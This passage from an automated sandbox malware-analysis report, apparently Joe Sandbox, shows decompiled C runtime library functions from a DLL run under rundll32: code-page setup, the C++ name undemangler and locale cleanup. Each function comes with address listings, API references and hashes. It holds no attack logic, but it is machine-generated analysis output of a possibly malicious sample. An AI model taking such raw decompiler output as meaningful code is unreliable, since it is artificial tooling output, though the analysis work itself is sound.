						E100268B3(_v52);
						E100268B3(_v32);
						E100268B3(_t237);
						E100268B3(_v36);
						_t205 = 1;
						__eflags = 1;
						goto L44;
					} else {
						_t217 = _v40;
						if(_t217 == 0 || _t237 == 0 || _v36 == _t205) {
							goto L43;
						} else {
							_t147 = _t205;
							do {
								 *((char*)(_t147 + _t217)) = _t147;
								_t147 = _t147 + 1;
							} while (_t147 < 0x100);
							if(GetCPInfo( *(_t254 + 8),  &_v28) == 0) {
								goto L43;
							}
							_t150 = _v28;
							if(_t150 > 5) {
								goto L43;
							}
							_t151 = _t150 & 0x0000ffff;
							_v60 = _t151;
							if(_t151 <= 1) {
								L22:
								_t37 = _t237 + 0x81; // 0x81
								_t233 = 0xff;
								_v48 = _v40 + 1;
								_t153 = E100318A5(_t284, _t205,  *((intOrPtr*)(_t254 + 0xa8)), 0x100, _v40 + 1, 0xff, _t37, 0xff,  *(_t254 + 8), _t205);
								_t266 = _t266 + 0x24;
								_t285 = _t153;
								if(_t153 == 0) {
									goto L43;
								}
								_t156 = E100318A5(_t285, _t205,  *((intOrPtr*)(_t254 + 0xa8)), 0x200, _v48, 0xff, _v36 + 0x81, 0xff,  *(_t254 + 8), _t205);
								_t266 = _t266 + 0x24;
								_t286 = _t156;
								if(_t156 == 0) {
									goto L43;
								}
								_v72 = _v32 + 0x100;
								_t159 = E1002E537(0xff, _t286, _t205, 1, _v40, 0x100, _v32 + 0x100,  *(_t254 + 8), _t205);
								_t266 = _t266 + 0x1c;
								if(_t159 == 0) {
									goto L43;
								}
								_t160 = _v32;
								_t221 = _t160 + 0xfe;
								 *_t221 = 0;
								_t233 = _v44;
								_v76 = _t221;
								_t222 = _v36;
								_t239 = _t233 + 0x80;
								 *((char*)(_t233 + 0x7f)) = _t205;
								_v80 = _t239;
								 *((char*)(_t222 + 0x7f)) = _t205;
								 *_t239 = _t205;
								_t240 = _t222 + 0x80;
								_v84 = _t240;
								 *_t240 = _t205;
								if(_v60 <= 1) {
									L39:
									_t223 = 0x3f;
									_push(0x1f);
									memcpy(_v32, _v32 + 0x200, _t223 << 2);
									_push(0x1f);
									asm("movsw");
									_t164 = memcpy(_t233, _t233 + 0x100, 0 << 2);
									asm("movsw");
									asm("movsb");
									_t165 = memcpy(_t164, _t164 + 0x100, 0 << 2);
									asm("movsw");
									asm("movsb");
									_t258 = _v56;
									if( *((intOrPtr*)(_t258 + 0x8c)) != 0) {
										asm("lock xadd [ecx], eax");
										if((_t165 | 0xffffffff) == 0) {
											E100268B3( *((intOrPtr*)(_t258 + 0x90)) - 0xfe);
											E100268B3( *((intOrPtr*)(_t258 + 0x94)) - 0x80);
											E100268B3( *((intOrPtr*)(_t258 + 0x98)) - 0x80);
											E100268B3( *((intOrPtr*)(_t258 + 0x8c)));
										}
									}
									_t166 = _v52;
									 *_t166 = 1;
									 *((intOrPtr*)(_t258 + 0x8c)) = _t166;
									 *_t258 = _v72;
									 *((intOrPtr*)(_t258 + 0x90)) = _v76;
									 *((intOrPtr*)(_t258 + 0x94)) = _v80;
									 *((intOrPtr*)(_t258 + 0x98)) = _v84;
									 *(_t258 + 4) = _v60;
									L44:
									E100268B3(_v40);
									_t129 = _t205;
									goto L48;
								}
								if( *(_t254 + 8) != 0xfde9) {
									_t251 =  &_v22;
									__eflags = _v22 - _t205;
									if(_v22 == _t205) {
										goto L39;
									}
									_t207 = _v32;
									while(1) {
										_t183 = _t251[1];
										__eflags = _t183;
										if(_t183 == 0) {
											break;
										}
										_t259 =  *_t251 & 0x000000ff;
										_v64 = _t259;
										__eflags = _t259 - (_t183 & 0x000000ff);
										if(_t259 > (_t183 & 0x000000ff)) {
											L37:
											_t251 =  &(_t251[2]);
											__eflags =  *_t251;
											if( *_t251 != 0) {
												continue;
											}
											break;
										}
										_v48 = _t233;
										_t186 = _t222 + 0x80 + _t259;
										_t235 = _t233 - _t222;
										__eflags = _t235;
										_t230 = _v64;
										_t260 = _t207 - 0xffffff00 + _t259 * 2;
										_v68 = _t186;
										_t209 = _t186;
										do {
											 *_t260 = 0x8000;
											_t260 = _t260 + 2;
											 *(_t235 + _t209) = _t230;
											 *_t209 = _t230;
											_t230 = _t230 + 1;
											_t209 =  &(_t209[0]);
											__eflags = _t230 - (_t251[1] & 0x000000ff);
										} while (_t230 <= (_t251[1] & 0x000000ff));
										_t233 = _v44;
										_t222 = _v36;
										_t207 = _v32;
										goto L37;
									}
									L38:
									_t205 = 0;
									goto L39;
								}
								_v44 = _t160 + 0x200;
								_t231 = _t233 + 0x100;
								_t253 = _t222 - _t233;
								_t190 = 0xffffff80;
								_v48 = _t190 - _t233;
								do {
									_push(0x32);
									asm("sbb eax, eax");
									_v44 = _v44 + 2;
									 *_v44 = (0xfffffebe + _t231 & 0xffff8000) + 0x8000;
									_t212 = _v48;
									_t195 = _t231 + _t212;
									 *_t231 = _t195;
									 *((char*)(_t253 + _t231)) = _t195;
									_t231 = _t231 + 1;
								} while (_t212 + _t231 <= 0xff);
								goto L38;
							}
							_t284 =  *(_t254 + 8) - 0xfde9;
							if( *(_t254 + 8) != 0xfde9) {
								_t236 =  &_v22;
								__eflags = _v22 - _t205;
								if(__eflags == 0) {
									goto L22;
								}
								_t232 = _v40;
								while(1) {
									_t197 = _t236[1];
									__eflags = _t197;
									if(__eflags == 0) {
										break;
									}
									_t263 =  *_t236 & 0x000000ff;
									__eflags = _t263 - (_t197 & 0x000000ff);
									if(_t263 > (_t197 & 0x000000ff)) {
										L20:
										_t236 =  &(_t236[2]);
										__eflags =  *_t236 - _t205;
										if(__eflags != 0) {
											continue;
										}
										break;
									} else {
										goto L19;
									}
									do {
										L19:
										 *((char*)(_t263 + _t232)) = 0x20;
										_t263 = _t263 + 1;
										__eflags = _t263 - (_t236[1] & 0x000000ff);
									} while (_t263 <= (_t236[1] & 0x000000ff));
									goto L20;
								}
								_t254 = _v56;
								goto L22;
							}
							E100050F0(_t237, _v40 - 0xffffff80, 0x20, 0x80);
							_t266 = _t266 + 0xc;
							goto L22;
						}
					}
				}
				_t204 = E10037D5C(__edx,  &_v92, 0, _t213, 0x1004, _t131);
				_t266 = _t265 + 0x14;
				if(_t204 != 0) {
					goto L43;
				}
				goto L3;
			}

0x1002e7a1
0x1002e7a9
0x1002e7b0
0x1002e7b5
0x1002e7b8
0x1002e7bb
0x1002e7be
0x1002e7c0
0x1002e7c3
0x1002e7c9
0x1002e7cc
0x1002e7cf
0x1002e7d2
0x1002e7d7
0x1002ebba
0x1002ebbc
0x1002ebbe
0x1002ebbe
0x1002ebc1
0x1002ebc7
0x1002ebc7
0x1002ebc9
0x1002ebcf
0x1002ebd5
0x1002ebdf
0x1002ebe9
0x1002ebf0
0x1002ebfe
0x1002ebfe
0x1002e7dd
0x1002e7e0
0x1002e7e5
0x1002e803
0x1002e80d
0x1002e810
0x1002e823
0x1002e826
0x1002e833
0x1002e836
0x1002e839
0x1002e84b
0x1002e84e
0x1002e860
0x1002e863
0x1002e868
0x1002e86e
0x1002eb83
0x1002eb86
0x1002eb8e
0x1002eb94
0x1002eb9c
0x1002eba6
0x1002eba6
0x00000000
0x1002e87d
0x1002e87d
0x1002e882
0x00000000
0x1002e899
0x1002e899
0x1002e89b
0x1002e89b
0x1002e89e
0x1002e89f
0x1002e8b5
0x00000000
0x00000000
0x1002e8bb
0x1002e8c1
0x00000000
0x00000000
0x1002e8c7
0x1002e8ca
0x1002e8d0
0x1002e926
0x1002e929
0x1002e933
0x1002e948
0x1002e94c
0x1002e951
0x1002e954
0x1002e956
0x00000000
0x00000000
0x1002e97f
0x1002e984
0x1002e987
0x1002e989
0x00000000
0x00000000
0x1002e9a4
0x1002e9aa
0x1002e9af
0x1002e9b4
0x00000000
0x00000000
0x1002e9ba
0x1002e9c3
0x1002e9c9
0x1002e9cc
0x1002e9cf
0x1002e9d2
0x1002e9d5
0x1002e9db
0x1002e9de
0x1002e9e1
0x1002e9e4
0x1002e9e6
0x1002e9ec
0x1002e9ef
0x1002e9f1
0x1002eac1
0x1002eac8
0x1002eac9
0x1002ead4
0x1002ead7
0x1002ead9
0x1002eae3
0x1002eae6
0x1002eae8
0x1002eaf1
0x1002eaf3
0x1002eaf5
0x1002eaf6
0x1002eb01
0x1002eb06
0x1002eb0a
0x1002eb18
0x1002eb2b
0x1002eb39
0x1002eb44
0x1002eb49
0x1002eb0a
0x1002eb4c
0x1002eb4f
0x1002eb55
0x1002eb5e
0x1002eb63
0x1002eb6c
0x1002eb75
0x1002eb7e
0x1002eba7
0x1002ebaa
0x1002ebb0
0x00000000
0x1002ebb0
0x1002e9fe
0x1002ea57
0x1002ea5a
0x1002ea5d
0x00000000
0x00000000
0x1002ea5f
0x1002ea62
0x1002ea62
0x1002ea65
0x1002ea67
0x00000000
0x00000000
0x1002ea69
0x1002ea6f
0x1002ea72
0x1002ea74
0x1002eab7
0x1002eab7
0x1002eaba
0x1002eabd
0x00000000
0x00000000
0x00000000
0x1002eabd
0x1002ea7c
0x1002ea85
0x1002ea87
0x1002ea87
0x1002ea89
0x1002ea8c
0x1002ea8f
0x1002ea92
0x1002ea94
0x1002ea99
0x1002ea9c
0x1002ea9f
0x1002eaa2
0x1002eaa4
0x1002eaa9
0x1002eaaa
0x1002eaaa
0x1002eaae
0x1002eab1
0x1002eab4
0x00000000
0x1002eab4
0x1002eabf
0x1002eabf
0x00000000
0x1002eabf
0x1002ea07
0x1002ea0a
0x1002ea17
0x1002ea19
0x1002ea1e
0x1002ea21
0x1002ea24
0x1002ea2c
0x1002ea2e
0x1002ea3c
0x1002ea3f
0x1002ea42
0x1002ea45
0x1002ea47
0x1002ea4a
0x1002ea4e
0x00000000
0x1002ea55
0x1002e8d2
0x1002e8d9
0x1002e8f3
0x1002e8f6
0x1002e8f9
0x00000000
0x00000000
0x1002e8fb
0x1002e8fe
0x1002e8fe
0x1002e901
0x1002e903
0x00000000
0x00000000
0x1002e905
0x1002e90b
0x1002e90d
0x1002e91c
0x1002e91c
0x1002e91f
0x1002e921
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x1002e90f
0x1002e90f
0x1002e90f
0x1002e913
0x1002e918
0x1002e918
0x00000000
0x1002e90f
0x1002e923
0x00000000
0x1002e923
0x1002e8e9
0x1002e8ee
0x00000000
0x1002e8ee
0x1002e882
0x1002e86e
0x1002e7f3
0x1002e7f8
0x1002e7fd
0x00000000
0x00000000
0x00000000

APIs

_free.LIBCMT ref: 1002E810
_free.LIBCMT ref: 1002E826
_free.LIBCMT ref: 1002E839
_free.LIBCMT ref: 1002E84E
_free.LIBCMT ref: 1002E863
GetCPInfo.KERNEL32(?,?), ref: 1002E8AD

Part of subcall function 10037D5C: _free.LIBCMT ref: 10037DC7

_free.LIBCMT ref: 1002EB18
_free.LIBCMT ref: 1002EB2B
_free.LIBCMT ref: 1002EB39
_free.LIBCMT ref: 1002EB44
_free.LIBCMT ref: 1002EB86
_free.LIBCMT ref: 1002EB8E
_free.LIBCMT ref: 1002EB94
_free.LIBCMT ref: 1002EB9C
_free.LIBCMT ref: 1002EBAA

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: f7ec84a5157e58a8a6bc663e412cef8f61bcd6c2dbe3a2a6ff2e487cbc6986f7
Instruction ID: a43070e0b0711e41ad9a0cb5ae2b548a2436ceb787582ea256af61a5ca8909b4
Opcode Fuzzy Hash: f7ec84a5157e58a8a6bc663e412cef8f61bcd6c2dbe3a2a6ff2e487cbc6986f7
Instruction Fuzzy Hash: 7CD19E75D002859FDB11CFA4D881BEEBBF5FF08300F944169E995A7282DB71AD458B60

Uniqueness

Uniqueness Score: -1.00%

Function 1000B7FB, Relevance: 19.8, APIs: 13, Instructions: 301
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 95%

			E1000B7FB(void* __edx, signed int* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				char _v60;
				intOrPtr _v64;
				char* _v68;
				char _v76;
				char _v84;
				char _v92;
				char _v100;
				char _v108;
				char _v116;
				char _v124;
				char _v132;
				char _v140;
				char _v148;
				char _v156;
				char _v164;
				char _v172;
				char _v180;
				char _v188;
				char _v196;
				char _v204;
				char _v212;
				char _v220;
				char _v228;
				char _v236;
				char _v244;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t90;
				intOrPtr _t91;
				intOrPtr* _t92;
				intOrPtr _t93;
				signed int* _t96;
				char* _t99;
				void* _t101;
				signed int* _t102;
				void* _t106;
				void* _t109;
				void* _t118;
				void* _t122;
				void* _t125;
				char* _t129;
				void* _t131;
				void* _t132;
				void* _t135;
				char* _t141;
				void* _t144;
				signed int* _t153;
				signed int _t164;
				char* _t174;
				signed int* _t176;
				char* _t177;
				intOrPtr* _t182;
				signed int* _t186;
				signed int* _t191;
				signed int _t196;
				signed int* _t199;
				void* _t203;
				signed int _t204;
				signed int* _t206;
				void* _t207;

				_t203 = __edx;
				_t206 = _a4;
				 *_t206 =  *_t206 & 0x00000000;
				_t206[1] = _t206[1] & 0x00000000;
				_t164 = 0;
				while(1) {
					_t90 =  *0x1004e004; // 0x0
					_t91 =  *_t90;
					if(_t91 == 0 || _t91 == 0x40) {
						break;
					}
					if( *0x1004e010 == 0 ||  *0x1004e011 != 0) {
						if( *_t206 != 0) {
							_v44 = "::";
							_v40 = 2;
							_t185 = E1000723E( &_v108,  &_v44);
							E100076A6(_t156,  &_v52, _t206);
							 *_t206 = _v52;
							_t206[1] = _v48;
							if(_t164 != 0) {
								_t186 = E10007637(_t185,  &_v116, 0x5b, _t206);
								_t207 = _t207 + 0xc;
								_t164 = 0;
								 *_t206 =  *_t186;
								_t206[1] = _t186[1];
							}
						}
						_t99 =  *0x1004e004; // 0x0
						if( *_t99 != 0x3f) {
							_t101 = E1000CF24(_t203,  &_v92, 1, 0);
							_t174 =  &_v100;
							L36:
							_t207 = _t207 + 0xc;
							L37:
							_t102 = E100076A6(_t101, _t174, _t206);
							L38:
							_t176 = _t102;
							 *_t206 =  *_t176;
							_t206[1] = _t176[1];
							L39:
							if(_t206[1] == 0) {
								continue;
							}
							break;
						}
						_t15 = _t99 + 1; // 0x1
						_t177 = _t15;
						 *0x1004e004 = _t177;
						_t106 =  *_t177 - 0x24;
						if(_t106 == 0) {
							_t71 = _t177 - 1; // 0x0
							 *0x1004e004 = _t71;
							_t101 = E1000CF24(_t203,  &_v244, 1, 0);
							_t174 =  &_v84;
							goto L36;
						}
						_t109 = _t106 - 1;
						if(_t109 == 0) {
							L32:
							E100071BE( &_v76, 0x1004e004, 0x40);
							_v68 = "`anonymous namespace\'";
							_v64 = 0x15;
							E100076A6(E1000723E( &_v236,  &_v68),  &_v20, _t206);
							 *_t206 = _v20;
							_t206[1] = _v16;
							_t182 =  *0x1004dffc; // 0x0
							__eflags =  *_t182 - 9;
							if(__eflags != 0) {
								E100078F0(_t182,  &_v76);
							}
							goto L39;
						}
						_t118 = _t109 - 0x1a;
						if(_t118 == 0) {
							__eflags =  *((char*)(_t177 + 1)) - 0x5f;
							if(__eflags != 0) {
								L31:
								_push( &_v204);
								_t122 = E10007637(_t177,  &_v212, 0x60, L10009B9E(_t164, _t177, _t203, _t204, _t206, __eflags));
								_t207 = _t207 + 0x10;
								_t101 = E100076C8(_t122,  &_v220, 0x27);
								_t174 =  &_v228;
								goto L37;
							}
							__eflags =  *((char*)(_t177 + 2)) - 0x3f;
							if(__eflags != 0) {
								goto L31;
							}
							_t52 = _t177 + 1; // 0x2
							 *0x1004e004 = _t52;
							_t125 = E1000AB0E(_t203,  &_v188, 0, 0);
							_t207 = _t207 + 0xc;
							_t191 = E100076A6(_t125,  &_v196, _t206);
							 *_t206 =  *_t191;
							_t206[1] = _t191[1];
							_t129 =  *0x1004e004; // 0x0
							__eflags =  *_t129 - 0x40;
							if(__eflags != 0) {
								goto L39;
							}
							L30:
							 *0x1004e004 =  *0x1004e004 + 1;
							goto L39;
						}
						_t131 = _t118;
						if(_t131 == 0) {
							goto L32;
						}
						_t132 = _t131 - 8;
						if(_t132 == 0) {
							_t46 = _t177 + 1; // 0x2
							 *0x1004e004 = _t46;
							_t135 = E1000CF24(_t203,  &_v164, 1, 0);
							_t207 = _t207 + 0xc;
							_t102 = E100076A6(E100076C8(_t135,  &_v172, 0x5d),  &_v180, _t206);
							_t164 = 1;
							goto L38;
						}
						_t222 = _t132 == 8;
						if(_t132 == 8) {
							_t18 = _t177 + 1; // 0x2
							_t19 =  &_v8;
							 *_t19 = _v8 & 0;
							__eflags =  *_t19;
							_v12 = 0;
							 *0x1004e004 = _t18;
							while(1) {
								E1000CF24(_t203,  &_v36, 1, 0);
								_t196 = _v32;
								_t207 = _t207 + 0xc;
								__eflags = _t196;
								if(_t196 != 0) {
									_t196 = 2;
									_t204 = 0;
									__eflags = 0;
								} else {
									__eflags = _t204;
									if(_t204 == 0) {
										_t204 = _v36;
									} else {
										_v28 = _v36;
										_v24 = _t196;
										_v60 = "::";
										_v56 = 2;
										E10007748( &_v28,  &_v60);
										_t153 = E100076A6( &_v28,  &_v140,  &_v12);
										_t204 =  *_t153;
										_t196 = _t153[1];
									}
								}
								_v8 = _t196;
								_v12 = _t204;
								__eflags = _t196;
								if(__eflags != 0) {
									break;
								}
								_t141 =  *0x1004e004; // 0x0
								__eflags =  *_t141 - 0x40;
								if( *_t141 != 0x40) {
									continue;
								}
								_t144 = E10007637(_t196,  &_v148, 0x5b,  &_v12);
								_t207 = _t207 + 0xc;
								_t199 = E100076C8(_t144,  &_v156, 0x5d);
								 *_t206 =  *_t199;
								_t206[1] = _t199[1];
								goto L30;
							}
							_t206[1] = _t206[1] & 0x00000000;
							 *_t206 =  *_t206 & 0x00000000;
							_t206[1] = 2;
							goto L39;
						} else {
							_t101 = E1000A99E(_t177, _t203, _t222,  &_v124);
							_t174 =  &_v132;
							goto L37;
						}
					} else {
						L46:
						return _t206;
					}
				}
				_t92 =  *0x1004e004; // 0x0
				_t93 =  *_t92;
				if(_t93 == 0) {
					__eflags =  *_t206;
					_push(1);
					if( *_t206 != 0) {
						_v20 = "::";
						_v16 = 2;
						_t96 = E100076A6(E10007684(E100072DE( &_v100),  &_v92,  &_v20),  &_v84, _t206);
						 *_t206 =  *_t96;
						_t206[1] = _t96[1];
					} else {
						E10007596(_t206);
					}
				} else {
					if(_t93 != 0x40) {
						_t206[1] = _t206[1] & 0x00000000;
						 *_t206 =  *_t206 & 0x00000000;
						_t206[1] = 2;
					}
				}
				goto L46;
			}

0x1000b7fb
0x1000b806
0x1000b80a
0x1000b80d
0x1000b811
0x1000b813
0x1000b813
0x1000b818
0x1000b81c
0x00000000
0x00000000
0x1000b831
0x1000b843
0x1000b848
0x1000b853
0x1000b864
0x1000b866
0x1000b86e
0x1000b873
0x1000b878
0x1000b886
0x1000b888
0x1000b88b
0x1000b88f
0x1000b894
0x1000b894
0x1000b878
0x1000b897
0x1000b89f
0x1000bb15
0x1000bb1a
0x1000bb1d
0x1000bb1d
0x1000bb20
0x1000bb24
0x1000bb29
0x1000bb29
0x1000bb2d
0x1000bb32
0x1000bb35
0x1000bb39
0x00000000
0x00000000
0x00000000
0x1000bb39
0x1000b8a5
0x1000b8a5
0x1000b8a8
0x1000b8b1
0x1000b8b4
0x1000baf0
0x1000baf5
0x1000bb03
0x1000bb08
0x00000000
0x1000bb08
0x1000b8ba
0x1000b8bd
0x1000ba97
0x1000baa1
0x1000baa9
0x1000bab7
0x1000baca
0x1000bad2
0x1000bad7
0x1000bada
0x1000bae0
0x1000bae3
0x1000bae9
0x1000bae9
0x00000000
0x1000bae3
0x1000b8c3
0x1000b8c6
0x1000ba03
0x1000ba07
0x1000ba5e
0x1000ba64
0x1000ba74
0x1000ba79
0x1000ba87
0x1000ba8c
0x00000000
0x1000ba8c
0x1000ba09
0x1000ba0d
0x00000000
0x00000000
0x1000ba0f
0x1000ba14
0x1000ba22
0x1000ba27
0x1000ba39
0x1000ba3d
0x1000ba42
0x1000ba45
0x1000ba4a
0x1000ba4d
0x00000000
0x00000000
0x1000ba53
0x1000ba53
0x00000000
0x1000ba53
0x1000b8cd
0x1000b8d0
0x00000000
0x00000000
0x1000b8d6
0x1000b8d9
0x1000b9c2
0x1000b9c7
0x1000b9d5
0x1000b9da
0x1000b9f7
0x1000b9fc
0x00000000
0x1000b9fc
0x1000b8df
0x1000b8e2
0x1000b8f8
0x1000b8fb
0x1000b8fb
0x1000b8fb
0x1000b8fe
0x1000b901
0x1000b906
0x1000b90e
0x1000b913
0x1000b916
0x1000b919
0x1000b91b
0x1000b965
0x1000b966
0x1000b966
0x1000b91d
0x1000b91d
0x1000b91f
0x1000b95e
0x1000b921
0x1000b924
0x1000b92a
0x1000b931
0x1000b938
0x1000b93f
0x1000b952
0x1000b957
0x1000b959
0x1000b959
0x1000b91f
0x1000b968
0x1000b96b
0x1000b96e
0x1000b970
0x00000000
0x00000000
0x1000b972
0x1000b977
0x1000b97a
0x00000000
0x00000000
0x1000b989
0x1000b98e
0x1000b9a1
0x1000b9a5
0x1000b9aa
0x00000000
0x1000b9aa
0x1000b9b2
0x1000b9b6
0x1000b9b9
0x00000000
0x1000b8e4
0x1000b8e8
0x1000b8ee
0x00000000
0x1000b8ee
0x1000bba7
0x1000bba7
0x1000bbac
0x1000bbac
0x1000b831
0x1000bb3f
0x1000bb44
0x1000bb48
0x1000bb5b
0x1000bb5e
0x1000bb60
0x1000bb6e
0x1000bb75
0x1000bb97
0x1000bb9e
0x1000bba3
0x1000bb62
0x1000bb64
0x1000bb64
0x1000bb4a
0x1000bb4c
0x1000bb4e
0x1000bb52
0x1000bb55
0x1000bb55
0x1000bb4c
0x00000000

APIs

DName::operator+.LIBCMT ref: 1000B866
DName::operator+.LIBCMT ref: 1000B99C

Part of subcall function 10007748: shared_ptr.LIBCMT ref: 10007764

DName::operator+.LIBCMT ref: 1000B9E8
DName::operator+.LIBCMT ref: 1000B9F7
DName::operator+.LIBCMT ref: 1000B952

Part of subcall function 1000CF24: DName::operator=.LIBVCRUNTIME ref: 1000CFB3

DName::operator+.LIBCMT ref: 1000BB24
DName::operator=.LIBVCRUNTIME ref: 1000BB64
DName::DName.LIBVCRUNTIME ref: 1000BB7C
DName::operator+.LIBCMT ref: 1000BB8B
DName::operator+.LIBCMT ref: 1000BB97

Part of subcall function 1000CF24: Replicator::operator[].LIBVCRUNTIME ref: 1000CF61

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: Name::operator+$Name::operator=$NameName::Replicator::operator[]shared_ptr
String ID:
API String ID: 1026175760-0
Opcode ID: 31b5ecf051329b541345bd7913f4edbac89e0eeeccac291c9b78518f8dea3edb
Instruction ID: 865cfd34c394bda65aa44f7df4ae2116b870d9faa91fa5b2e98e0a47c1a3d343
Opcode Fuzzy Hash: 31b5ecf051329b541345bd7913f4edbac89e0eeeccac291c9b78518f8dea3edb
Instruction Fuzzy Hash: 9AC1BF71D006489FEB20CFA4C985FEEBBF8EB05380F10445DE14AE7289EB75AA44CB55

Uniqueness

Uniqueness Score: -1.00%

Function 1002E173, Relevance: 19.6, APIs: 13, Instructions: 113
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E1002E173(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0x1004d788) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E100268B3(_t46);
							E1002EC4B( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E100268B3(_t47);
							E1002F136( *((intOrPtr*)(_t74 + 0x88)));
						}
						E100268B3( *((intOrPtr*)(_t74 + 0x7c)));
						E100268B3( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E100268B3( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E100268B3( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E100268B3( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E100268B3( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E1002E2E4( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t55 = _t74 + 0xa0;
				_v8 = _t28;
				_t70 = _t74 + 0x28;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0x1004d178) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E100268B3(_t31);
							E100268B3( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							E100268B3(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E100268B3(_t74);
			}

0x1002e17b
0x1002e17f
0x1002e187
0x1002e190
0x1002e195
0x1002e19c
0x1002e1a4
0x1002e1ac
0x1002e1b7
0x1002e1bd
0x1002e1be
0x1002e1c6
0x1002e1ce
0x1002e1d9
0x1002e1df
0x1002e1e3
0x1002e1ee
0x1002e1f4
0x1002e195
0x1002e1f5
0x1002e1fd
0x1002e210
0x1002e223
0x1002e231
0x1002e23c
0x1002e241
0x1002e24a
0x1002e252
0x1002e253
0x1002e259
0x1002e25c
0x1002e25f
0x1002e266
0x1002e268
0x1002e26c
0x1002e274
0x1002e27b
0x1002e281
0x1002e282
0x1002e282
0x1002e289
0x1002e28b
0x1002e290
0x1002e298
0x1002e29d
0x1002e29e
0x1002e29e
0x1002e2a1
0x1002e2a4
0x1002e2a7
0x1002e2aa
0x1002e2aa
0x1002e2ba

APIs

___free_lconv_mon.LIBCMT ref: 1002E1B7

Part of subcall function 1002EC4B: _free.LIBCMT ref: 1002EC68
Part of subcall function 1002EC4B: _free.LIBCMT ref: 1002EC7A
Part of subcall function 1002EC4B: _free.LIBCMT ref: 1002EC8C
Part of subcall function 1002EC4B: _free.LIBCMT ref: 1002EC9E
Part of subcall function 1002EC4B: _free.LIBCMT ref: 1002ECB0
Part of subcall function 1002EC4B: _free.LIBCMT ref: 1002ECC2
Part of subcall function 1002EC4B: _free.LIBCMT ref: 1002ECD4
Part of subcall function 1002EC4B: _free.LIBCMT ref: 1002ECE6
Part of subcall function 1002EC4B: _free.LIBCMT ref: 1002ECF8
Part of subcall function 1002EC4B: _free.LIBCMT ref: 1002ED0A
Part of subcall function 1002EC4B: _free.LIBCMT ref: 1002ED1C
Part of subcall function 1002EC4B: _free.LIBCMT ref: 1002ED2E
Part of subcall function 1002EC4B: _free.LIBCMT ref: 1002ED40

_free.LIBCMT ref: 1002E1AC

Part of subcall function 100268B3: HeapFree.KERNEL32(00000000,00000000), ref: 100268C9
Part of subcall function 100268B3: GetLastError.KERNEL32(?,?,1002F4C1,?,00000000,?,00000000,?,1002F7E1,?,00000007,?,?,1002E30A,?,?), ref: 100268DB

_free.LIBCMT ref: 1002E1CE
_free.LIBCMT ref: 1002E1E3
_free.LIBCMT ref: 1002E1EE
_free.LIBCMT ref: 1002E210
_free.LIBCMT ref: 1002E223
_free.LIBCMT ref: 1002E231
_free.LIBCMT ref: 1002E23C
_free.LIBCMT ref: 1002E274
_free.LIBCMT ref: 1002E27B
_free.LIBCMT ref: 1002E298
_free.LIBCMT ref: 1002E2B0

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

